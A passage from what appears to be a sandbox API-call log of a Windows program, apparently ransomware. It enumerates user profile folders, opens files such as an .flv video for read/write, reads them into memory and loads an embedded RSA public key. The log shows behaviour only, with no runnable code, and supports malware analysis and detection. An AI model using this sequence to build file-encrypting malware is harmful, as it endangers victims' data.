wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.095] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0170.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.095] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.095] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.095] PathFindFileNameW (pszPath="") returned="" [0170.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0xffffffff [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.095] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.096] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0170.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.096] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.096] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.096] PathFindFileNameW (pszPath="") returned="" [0170.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.096] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.096] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0170.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.096] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0170.096] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.097] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.097] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0170.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.097] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.097] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.097] PathFindFileNameW (pszPath="") returned="" [0170.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.097] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.098] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0170.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0170.098] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0170.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0170.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0170.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0170.098] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0170.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0170.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0170.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.099] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0170.099] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.099] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.099] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.099] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0170.099] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.099] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.099] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.099] PathFindFileNameW (pszPath="") returned="" [0170.099] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.100] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.100] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.100] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0170.100] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.100] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.100] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.100] PathFindFileNameW (pszPath="") returned="" [0170.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.100] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.101] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.101] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0170.101] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.101] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.101] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.101] PathFindFileNameW (pszPath="") returned="" [0170.101] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0170.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.101] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.101] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.101] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0170.101] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.102] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.102] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.102] PathFindFileNameW (pszPath="") returned="" [0170.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98d5b80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98d5b80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98d5b80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98d5b80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.102] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0170.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a3699e0, ftCreationTime.dwHighDateTime=0x1d5dc09, ftLastAccessTime.dwLowDateTime=0xa8ee3ff0, ftLastAccessTime.dwHighDateTime=0x1d5e01c, ftLastWriteTime.dwLowDateTime=0xa8ee3ff0, ftLastWriteTime.dwHighDateTime=0x1d5e01c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gOI6FhRK7 r-pcVYvKd", cAlternateFileName="GOI6FH~1")) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fa9f050, ftCreationTime.dwHighDateTime=0x1d5e17a, ftLastAccessTime.dwLowDateTime=0xb5cca540, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0xb5cca540, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V4xTSO7L1q6Ip", cAlternateFileName="V4XTSO~1")) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef26b590, ftCreationTime.dwHighDateTime=0x1d5e2e4, ftLastAccessTime.dwLowDateTime=0x47d67d70, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x47d67d70, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x148ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x5rI0NtYZ.flv", cAlternateFileName="X5RI0N~1.FLV")) returned 1 [0170.102] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x5rI0NtYZ.flv") returned=".flv" [0170.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x5rI0NtYZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\x5ri0ntyz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.103] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=84142) returned 1 [0170.103] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.106] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14888, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.106] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.107] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x148ae, lpOverlapped=0x0) returned 1 [0170.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.108] lstrlenA (lpString="-----BEGIN PUBLIC 